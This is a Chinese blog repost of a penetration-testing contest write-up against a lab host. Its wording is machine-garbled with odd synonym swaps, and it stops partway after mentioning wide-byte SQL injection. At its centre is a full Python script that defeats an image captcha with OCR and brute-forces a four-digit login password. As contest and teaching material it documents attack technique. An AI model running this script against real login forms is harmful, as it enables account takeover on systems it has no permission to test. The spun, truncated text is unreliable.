当前位置:首页 > 电脑常识 > 正文

某安适团队内部渗透角逐记录 8090安适门户

11-20 电脑常识

第一节:
title:进入192.168.1.6 获取秘匙。

ps: 跟 192.168.1.6是事情区
规程:渗透过程不得使用nmap等扫描端口工具,越发不能使用WEB扫描器。(只要有关于爬虫都不行 or 扫描owasp top 10 appsan wvs burp)除非工具是你小我私家写的。 越发不成以作弊:好比 ip斗嘴,中间人打击。请连结好小我私家本质。出格注意:全过程中不得求助增援,只能靠小我私家实力,为了防备作弊全过程需要屏幕录像。
打开 提示没权限访谒。。。
预计做了白名单验证。。。
然而: 是可以访谒的。
简单收集下信息:
[200] Apache[2.4.7], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[192.168.1.7], Index-Of, Title[Index of /]


提示说:暗码 4位int暗码。
我一开始想到了暗码爆破 至于验证码嘛 必定是存在session没更新导致验证码复用的缝隙,但是颠末测试发明这个缝隙不存在。
所以独一的步伐就是写验证码识别。。
分析一下验证码的 锚点 跟 滋扰线,以及模糊度 等。

颠末分析如果要让措施识别这种验证码等话告成率概略有90%。
# coding=utf-8
importrequests,pytesseract,os,time,re;
fromPILimportImage
 
cookie = {'PHPSESSID': 'e5n02iaupp5kbctejsn4i536m9'}
 
for inttin xrange(1000,9999):
    r = requests.get('http://www.liuyan.com/3.php',cookies=cookie) # 发送请求
    l = open('./3.png', 'w+')
    l.write(r.content);
    l.flush();
    os.fsync(l);
    l.close();
    if os.path.isfile('3.png') :
          Image.open('3.png')
          image = Image.open('3.png')
          vcode = pytesseract.image_to_string(image)
 
    canshu = {'act': 'post', 'password': intt ,'Verification':vcode}
    r = requests.post('http://www.liuyan.com/1.php',data=canshu,cookies=cookie)
    html = r.text.encode('utf-8');
    r = r"No,passworld";
 
    if re.findall(r,html) :
          print 'NO ,passwd: %i' % (intt);
 
    else:
          print 'YES ,passwd: %i' % (intt);
          break
 
    time.sleep(0.05);

[Bash shell] 纯文本检察 复制代码
暗码 1115
然后进入到这个页面:

一直想不大白这是干嘛的。单引号也没报错。然后经用失js。。

然后看到了这个:

应该是输出字符串之后就跳转了 导致看不到这个信息,再想他给我提示这个干啥?难到sql注入
看到了单引号被转义只能把注意力放到后台那边:

爆破了好久都没功效。。浪费了一堆时间,收集了出题官的手机啥的爆破都没功效。。
虽然单引号被转义了。但我俄然又想到了宽字节注入。。。

温馨提示: 本文由杰米博客推荐,转载请保留链接: https://www.jmwww.net/file/pc/12571.html

博客主人杰米WWW
杰米博客,为大家提供seo以及it方面技巧喜欢的朋友收藏哦!
  • 11365文章总数
  • 1378073访问次数
  • 建站天数
  •